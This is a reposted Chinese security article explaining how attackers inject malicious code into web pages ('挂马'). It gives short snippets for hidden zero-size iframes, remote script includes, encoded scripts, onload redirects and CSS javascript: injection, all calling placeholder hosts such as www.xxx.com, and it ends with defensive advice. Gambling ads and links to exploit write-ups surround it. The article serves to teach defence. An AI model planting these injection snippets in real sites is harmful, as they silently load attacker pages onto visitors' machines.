??斗地主捕鱼电竞提现秒到 广告位招租 - 15元/月全站展示
??支付宝搜索579087183领大额红包 ??伍彩集团官网直营彩票
??好待遇→招代理 ??伍彩集团官网直营彩票
??络茄网 广告位招租 - 15元/月全站展示
各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)

转载   佚名   2016-05-07   浏览量:445


下面介绍集中常见的网页挂马方式:

(1)iframe 框架挂马

在网页上增加一行挂马的程序,例如:
<iframe src=//www.xxx.com/xxx.html width=0 height=0></iframe>
这种嵌入是的挂马非常常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂马。这行语句就是在网页打开的时候,同时打开另外一个网页,当然这个网页可能包含大量的木马,也可能仅仅是为了骗取流量。
如果我们的网页不使用iframe,我们可以屏蔽iframe属性,这样,即使网页被iframe挂马,也不会伤害到访问网站的用户。
【原理】:
IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。
我们在网页中增加如下的代码即可屏蔽iframe属性:

<style type=”text/css”>
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
</style>
iframe 也可以采用加密的方式挂马,例如下面的代码:
<iframe src=//google-analitecs.com/in.cgi????? width=1 height=1></iframe>

(2)script 挂马

通过script的调用来挂马,可以挂直接的html文件,也可以挂js文件,可以明文挂马,为了躲避追查,也有加密挂马的形式,形式各异,千差万别,主要方式如下:
<script src=//%11%11%11%11%11%11%11></script>
这是一个加密的挂马语句;
2.1 htm文件挂马:

通过上传一个木马文件(x.htm)挂马,代码如下:
document.write(“<div style=’display:none’>”)
document.write(“<iframe src=x.htm width=0 height=0></iframe>”)
document.write(“</div>”)
htm 挂马代码:
<script src=x.htm></script>

2.2 js文件挂马

通过上传一个木马文件(x.js)挂马,代码如下:
document.write(“<iframe width=’0′ height=’0′ src=’//xxx.com/xxx.htm’></iframe>”);

 
JS挂马代码:
<script language=javascript src=x.js></script>
当然也可以挂互联网上任何一台机器的x.js文件;
2.3  js变形加密
<SCRIPT language=”JScript.Encode” src=//www.xxx.com/x.x></script>

(3)图片伪装挂马

随着防毒技术的发展,图片木马技术逃避杀毒监视的新技术,攻击者将类似://www.xxx.com/x.htm中的木马代码植入到x.gif图片文
件中,这些嵌入代码的图片都可以用工具生成。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:

<html>
<iframe src=”//www.x.com/x.htm” height=0 width=0></iframe>
<img src=”//www.x.com/x.jpg”></center>
</html>

当用户打开//www.x.com/x.htm是,显示给用户的是//www.x.com/x.jpg,而//www.x.com/x.htm网页代码也随之运行。

(4)其它的挂马方式
4.1 body挂马
<body onload=”window.location=’//xxx.com/xxx.htm’;”></body>
也可以在css的body中挂马
body {
background-image: url(‘javascript:document.write(“<script src=//www.xxx.com/x.js></script>”)’)}
4.2 隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML +
‘\r\n<iframe src=”//www.xxx.com/xxx.htm/”></iframe>’;
4.3 java的open函数挂马
直接调用:
<SCRIPT language=javascript>
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
</script>
欺骗调用:

<a href=”//www.a.com(迷惑连接地址,显示这个地址指向木马地址)” onMouseOver=”www_a_com(); return true;”> 页面要显示的内容 </a>
<SCRIPT Language=”JavaScript”>
function www_a_com ()
{
var url=”网马地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
</SCRIPT>

4.4 伪装调用:

<frameset rows=”444,0″ cols=”*”>
<frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>

形形色色的网页挂马,代码都十分简单,所以,互联网木马想要传播,就会不停的开发新的挂马方式,不停的加密隐藏自己,这样才能逃过各种安全软件的眼睛。其实,看看上文,很多语句都是编程常用的代码,只是使用的目的不一样罢了,了解了网页挂马的原理和方法,再防范网页挂马就容易多了。
带木马的网页主要包括两种类型:一种自己本身就是木马网站,所有的页面都有木马,另一种是正常的网站,由于管理不善,被挂马,成为木马网站的一个中转站,看看google中这样的网站何其多,可能很多站长现在还不知道,呵呵,多学习学习吧,站长可不是那么好当的。
不过,仅仅有了网络挂马的代码,也不一定一定能传播木马,只要我们加强防范,不让我们的网页被 挂马,甚至,即使被挂马了,打开了木马网页,我们的系统没有漏洞,木马网页也同样不能发挥作用的。所以,最重要的安全防范方式就是定期给系统打补丁,几乎 所有的木马网页都无法发挥作用了。

转载自://www.jb51.net/hack/457943.html

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024



Linux下防御/减轻DDOS攻击的方法
互联网如同现实社会一样充满钩心斗角,网站被DDOS也成为站长最头疼的事。在没有硬防的情况下,寻找软件代替是最直接的方法,比如用iptables,但是iptables不能在自动屏蔽,只能手动屏蔽
各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)
现在,网站经常被各种网页挂马,为了保障大家网站的安全和互联网用户的安全,有必要对网页挂马有所了解。查了一些资料,由于存在大量的黑客软件,一个菜鸟只需几分钟就可以编写一个木马网页,对别人的网站进行挂马了
利用WMI打造完美三无后门(scrcons.exe)
ASEC是WMI中的一个标准永久事件消费者。它的作用是当与其绑定的一个事件到达时,可以执行一段预先设定好的JS/VBS脚本
php intval()函数使用不当的安全漏洞分析
intval函数有个特性:"直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞
万博企业网站管理系统注入漏洞(MemberLogin.asp)
这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了
DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)
DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布) ,使用dedecms5.6的朋友可以参考下。
dedecms v5.6 GBK 注入漏洞利用(member/index.php)
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
脚本入侵-上传漏洞总结篇(臭小子)
脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别黑客利用。
各种网页挂马方式原理揭密 iframe挂马,script 挂马,图片伪装挂马等
现在,网站经常被各种网页挂马,为了保障大家网站的安全和互联网用户的安全,有必要对网页挂马有所了解。查了一些资料,由于存在大量的黑客软件,一个菜鸟只需几分钟就可以编写一个木马网页,对别人的网站进行挂马了